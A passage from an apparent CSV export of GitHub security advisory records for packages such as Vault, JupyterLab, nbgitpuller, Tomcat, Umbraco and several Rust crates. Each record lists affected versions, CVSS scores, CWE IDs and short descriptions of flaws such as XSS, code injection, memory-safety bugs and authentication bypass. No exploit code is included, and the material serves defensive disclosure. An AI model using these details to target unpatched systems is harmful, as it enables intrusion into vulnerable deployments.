Sensitive Information Before Storage or Transfer in HashiCorp Vault,HashiCorp Vault and Vault Enterprise’s UI erroneously cached and exposed user-viewed secrets between sessions in a single shared browser. Fixed in 1.8.0 and pending 1.7.4 / 1.6.6 releases.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '1.7.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38554'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-19-vault-s-ui-cached-user-viewed-secrets-between-shared-browser-sessions/28166'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.6.6'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/releases/tag/v1.7.4'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}]","{'cwe_ids': ['CWE-212'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:14:06Z', 'nvd_published_at': '2021-08-13T16:15:00Z'}" +1.4.0,GHSA-w65j-g6c7-g3m4,2021-08-24T19:13:30Z,2021-08-25T20:42:50Z,,[],Multiple memory safety issues in actix-web,"Affected versions contain multiple memory safety issues, such as: + + - Unsoundly coercing immutable references to mutable references + - Unsoundly extending lifetimes of strings + - Adding the `Send` marker trait to objects that cannot be safely sent between threads + +This may result in a variety of memory corruption scenarios, most likely use-after-free. + +A signficant refactoring effort has been conducted to resolve these issues. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'actix-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.15'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/actix/actix-web/issues/289'}, {'type': 'PACKAGE', 'url': 'https://github.com/actix/actix-web'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0019.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T19:13:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-xwxc-j97j-84gf,2023-06-13T20:35:51Z,2021-08-25T21:00:03Z,,[],Race condition in Parc,"In the affected versions of this crate, `LockWeak` unconditionally implemented `Send` with no trait bounds on `T`. `LockWeak` doesn't own `T` and only provides `&T`. This allows concurrent access to a non-Sync `T`, which can cause undefined behavior like data races. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'parc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hyyking/rustracts/pull/6'}, {'type': 'PACKAGE', 'url': 'https://github.com/hyyking/rustracts/tree/master/parc'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0134.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:05:10Z', 'nvd_published_at': None}" +1.4.0,GHSA-4952-p58q-6crx,2022-04-08T21:47:10Z,2021-08-23T19:40:22Z,,['CVE-2021-32797'],JupyterLab: XSS due to lack of sanitization of the action attribute of an html
,"### Impact + +Untrusted notebook can execute code on load. This is a remote code execution, but requires user action to open a notebook. + +### Patches + +Patched in the following versions: 3.1.4, 3.0.17, 2.3.2, 2.2.10, 1.2.21. + +### References + +[OWASP Page on Restricting Form Submissions](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html) + +### For more information + +If you have any questions or comments about this advisory, or vulnerabilities to report, please email our security list security@ipython.org. + +Credit: Guillaume Jeanne from Google +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.21'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'jupyterlab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'notebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.7.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'notebook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/google/security-research/security/advisories/GHSA-c469-p3jp-2vhx'}, {'type': 'WEB', 'url': 'https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4952-p58q-6crx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32797'}, {'type': 'WEB', 'url': 'https://github.com/jupyterlab/jupyterlab/commit/504825938c0abfa2fb8ff8d529308830a5ae42ed'}]","{'cwe_ids': ['CWE-75', 'CWE-79', 'CWE-87'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:41:37Z', 'nvd_published_at': '2021-08-09T21:15:00Z'}" +1.4.0,GHSA-7j44-fv4x-79g9,2023-06-13T19:58:10Z,2021-08-25T20:44:18Z,,['CVE-2019-16141'],Improper Input Validation in once_cell,"If during the first dereference of Lazy the initialization function panics, subsequent dereferences will execute std::hints::unreachable_unchecked. Applications with panic = ""abort"" are not affected, as there will be no subsequent dereferences.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'once_cell'}, 'ecosystem_specific': {'affected_functions': ['once_cell::sync::Lazy::deref', 'once_cell::sync::Lazy::force', 'once_cell::unsync::Lazy::deref', 'once_cell::unsync::Lazy::force']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.5'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16141'}, {'type': 'WEB', 'url': 'https://github.com/matklad/once_cell/issues/46'}, {'type': 'WEB', 'url': 'https://github.com/matklad/once_cell/pull/47'}, {'type': 'WEB', 'url': 'https://github.com/matklad/once_cell/commit/afcca95a05240ebd931ab20998c946f77ef1e284'}, {'type': 'PACKAGE', 'url': 'https://github.com/matklad/once_cell'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0017.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:57Z', 'nvd_published_at': None}" +1.4.0,GHSA-3288-cwgw-ch86,2021-08-19T17:44:05Z,2021-08-25T20:53:22Z,,['CVE-2021-26955'],Unchecked Return Value in xcb,An issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because xcb::xproto::GetAtomNameReply::name() calls std::str::from_utf8_unchecked() on unvalidated bytes from an X server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'xcb'}, 'ecosystem_specific': {'affected_functions': ['xcb::xproto::GetAtomNameReply::name']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26955'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rtbo/rust-xcb'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0019.html'}]","{'cwe_ids': ['CWE-252'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:44:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-g78p-g85h-q6ww,2021-08-24T18:31:50Z,2021-08-25T20:57:12Z,,['CVE-2020-36448'],Data races in cache,"An issue was discovered in the cache crate through 2020-11-24 for Rust. +Affected versions of this crate unconditionally implement Send/Sync for `Cache`. +This allows users to insert `K` that is not Send or not Sync. + +This allows users to create data races by using non-Send types like `Arc>` or `Rc` as `K` in `Cache`. It is also possible to create data races by using types like `Cell` or `RefCell` (types that are `Send` but not `Sync`). +Such data races can lead to memory corruption. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36448'}, {'type': 'WEB', 'url': 'https://github.com/krl/cache/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/cache'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0128.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:30:56Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-qrwc-jxf5-g8x6,2023-06-13T20:13:46Z,2021-08-25T20:48:40Z,,['CVE-2020-35890'],Out of bounds read in ordnung,An issue was discovered in the ordnung crate through version 0.0.1 for Rust. compact::Vec violates memory safety via out-of-bounds access for large capacity.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ordnung'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35890'}, {'type': 'WEB', 'url': 'https://github.com/maciejhirsz/ordnung/issues/8'}, {'type': 'PACKAGE', 'url': 'https://github.com/maciejhirsz/ordnung'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0038.html'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-gh87-6jr3-8q47,2021-08-19T18:45:43Z,2021-08-25T20:52:57Z,,['CVE-2021-25903'],Null pointer deference in cache,An issue was discovered in the cache crate through 2021-01-01 for Rust. A raw pointer is dereferenced.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25903'}, {'type': 'WEB', 'url': 'https://github.com/krl/cache/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/krl/cache'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0006.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:45:43Z', 'nvd_published_at': None}" +1.4.0,GHSA-6wj2-g87r-pm62,2021-08-18T21:33:18Z,2021-08-25T20:55:43Z,,['CVE-2021-38186'],Cross-site Scripting in comrak,"An issue was discovered in the comrak crate before 0.10.1 for Rust. It mishandles & characters, leading to XSS via &# HTML entities.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'comrak'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38186'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/commit/b72340cabe4749952530b4fb6b4fcc706bc973e5'}, {'type': 'PACKAGE', 'url': 'https://github.com/kivikakk/comrak'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/compare/0.10.0...0.10.1'}, {'type': 'WEB', 'url': 'https://github.com/kivikakk/comrak/releases/tag/0.10.1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0063.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:33:18Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-hj48-42vr-x3v9,2021-08-10T15:34:57Z,2021-08-10T15:33:47Z,,['CVE-2021-23343'],Regular Expression Denial of Service in path-parse,"Affected versions of npm package `path-parse` are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'path-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23343'}, {'type': 'WEB', 'url': 'https://github.com/jbgutierrez/path-parse/issues/8'}, {'type': 'WEB', 'url': 'https://github.com/jbgutierrez/path-parse/pull/10'}, {'type': 'WEB', 'url': 'https://github.com/jbgutierrez/path-parse/commit/eca63a7b9a473bf6978a2f5b7b3343662d1506f7'}, {'type': 'PACKAGE', 'url': 'https://github.com/jbgutierrez/path-parse'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a32cb3eda3b19096ad48ef1e7aa8f26e005f2f63765abb69ce08b85@%3Cdev.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1279028'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PATHPARSE-1077067'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T21:02:21Z', 'nvd_published_at': '2021-05-04T09:15:00Z'}" +1.4.0,GHSA-cfcv-q4qq-2ph4,2021-10-08T21:19:54Z,2021-08-23T19:42:05Z,,[],CKEditor 4 vulnerabilities in versions <4.16.1,"Details see: + +https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc ( CVE-2021-37695 ) +https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-6226-h7ff-ch6c ( CVE-2021-32808 ) +https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-7889-rm5j-hpgg ( CVE-2021-32809 ) + +Patch: +https://github.com/pimcore/pimcore/pull/10032",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-cfcv-q4qq-2ph4'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/0d2ce3b1db4ac40646cee5104115767505760b6a'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:15:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-mq5p-2mcr-m52j,2022-10-25T20:32:32Z,2021-08-30T16:17:06Z,,['CVE-2021-39160'],Code injection in nbgitpuller,"### Impact + +Due to an unsanitized input, visiting maliciously crafted links could result in arbitrary code execution in the user environment. + +### Patches + +0.10.2 + +### Workarounds + +None, other than upgrade to 0.10.2 or downgrade to 0.8.x. + + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [nbgitpuller](https://github.com/jupyterhub/nbgitpuller/issues) +* Email our security team at [security@ipython.org](mailto:security@ipython.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nbgitpuller'}, 'ecosystem_specific': {'affected_functions': ['nbgitpuller.pull.GitPuller.branch_exists', 'nbgitpuller.pull.GitPuller.initialize_repo']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.0'}, {'fixed': '0.10.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.10.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/jupyterhub/nbgitpuller/security/advisories/GHSA-mq5p-2mcr-m52j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39160'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/nbgitpuller/commit/07690644f29a566011dd0d7ba14cae3eb0490481'}, {'type': 'PACKAGE', 'url': 'https://github.com/jupyterhub/nbgitpuller'}, {'type': 'WEB', 'url': 'https://github.com/jupyterhub/nbgitpuller/blob/main/CHANGELOG.md#0102---2021-08-25'}]","{'cwe_ids': ['CWE-78', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-25T15:10:01Z', 'nvd_published_at': '2021-08-25T18:15:00Z'}" +1.4.0,GHSA-f6g6-54hm-fhxv,2021-08-18T19:58:56Z,2021-08-25T20:59:02Z,,['CVE-2020-36440'],Data races in libsbc,"Affected versions of this crate implements `Send` for `Decoder` for any `R: Read`. This allows `Decoder` to contain `R: !Send` and carry (move) it to another thread. + +This can result in undefined behavior such as memory corruption from data race on `R`, or dropping `R = MutexGuard<_>` from a thread that didn't lock the mutex. + +The flaw was corrected in commit a34d6e1 by adding trait bound `R: Send` to the `Send` impl for `Decoder`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'libsbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36440'}, {'type': 'WEB', 'url': 'https://github.com/mvertescher/libsbc-rs/commit/a34d6e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/mvertescher/libsbc-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/libsbc/RUSTSEC-2020-0120.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0120.html'}]","{'cwe_ids': ['CWE-119', 'CWE-362'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T22:36:23Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-8fgg-5v78-6g76,2022-05-04T03:04:59Z,2021-08-25T20:52:03Z,,['CVE-2021-28033'],Deserializing an array can free uninitialized memory in byte_struct,Byte_struct stack and unpack structure as raw bytes with packed or bit field layout. An issue was discovered in the byte_struct crate before 0.6.1 for Rust. There can be a drop of uninitialized memory if a certain deserialization method panics.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'byte_struct'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28033'}, {'type': 'WEB', 'url': 'https://github.com/wwylele/byte-struct-rs/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/wwylele/byte-struct-rs/commit/a535678377de12bc6bc22620c5f59bcc1369f76f'}, {'type': 'PACKAGE', 'url': 'https://github.com/wwylele/byte-struct-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0032.html'}]","{'cwe_ids': ['CWE-119', 'CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:25:30Z', 'nvd_published_at': '2021-03-05T09:15:00Z'}" +1.4.0,GHSA-34jq-548x-m2x9,2021-08-30T17:19:44Z,2021-08-30T17:22:57Z,,['CVE-2021-38623'],Improper Resource Shutdown or Release in TYPO3 extension,"Wrong usage of the TYPO3 FAL API results in copies of processed files being saved to the /var/transient/ folder of a TYPO3 website on every frontend request. This can result in Denial of Service, since the webspace may be filled up with image files simply by crafting a large amount of requests to the website.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'webcoast/deferred-image-processing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38623'}, {'type': 'PACKAGE', 'url': 'https://github.com/webcoast-dk/deferred-image-processing'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-009'}]","{'cwe_ids': ['CWE-404'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:19:44Z', 'nvd_published_at': '2021-08-13T17:15:00Z'}" +1.4.0,GHSA-36qh-35cm-5w2w,2022-02-08T21:08:59Z,2021-08-13T15:21:24Z,,['CVE-2021-30640'],Authentication Bypass by Alternate Name in Apache Tomcat,A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0M1'}, {'fixed': '9.0.45'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.65'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30640'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r59f9ef03929d32120f91f4ea7e6e79edd5688d75d0a9b65fd26d1fe8%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/08/msg00009.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210827-0007/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4952'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4986'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-116', 'CWE-287', 'CWE-289'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-13T19:21:02Z', 'nvd_published_at': '2021-07-12T15:15:00Z'}" +1.4.0,GHSA-j66f-h9hm-975m,2021-05-04T21:16:07Z,2021-08-02T17:38:56Z,,['CVE-2020-9472'],Unrestricted Upload of File with Dangerous Type in Umbraco CMS,Umbraco CMS 8.5.3 allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoCms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.5.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9472'}, {'type': 'WEB', 'url': 'https://gitlab.com/eLeN3Re/cve-2020-9472'}]","{'cwe_ids': ['CWE-434'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T21:16:07Z', 'nvd_published_at': '2020-03-16T20:15:00Z'}" +1.4.0,GHSA-3hxh-8cp2-g4hg,2021-08-24T18:16:10Z,2021-08-25T14:39:22Z,,['CVE-2021-37690'],Use after free and segfault in shape inference functions,"### Impact +When running shape functions, some functions (such as `MutableHashTableShape`) produce extra output information in the form of a `ShapeAndType` struct. The shapes embedded in this struct are owned by an inference context that is cleaned up almost immediately; if the upstream code attempts to access this shape information, it can trigger a segfault. + +`ShapeRefiner` is mitigating this for normal output shapes by cloning them (and thus putting the newly created shape under ownership of an inference context that will not die), but we were not doing the same for shapes and types. This commit fixes that by doing similar logic on output shapes and types. + +### Patches +We have patched the issue in GitHub commit [ee119d4a498979525046fba1c3dd3f13a039fbb1](https://github.com/tensorflow/tensorflow/commit/ee119d4a498979525046fba1c3dd3f13a039fbb1). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3hxh-8cp2-g4hg'}, {'type': 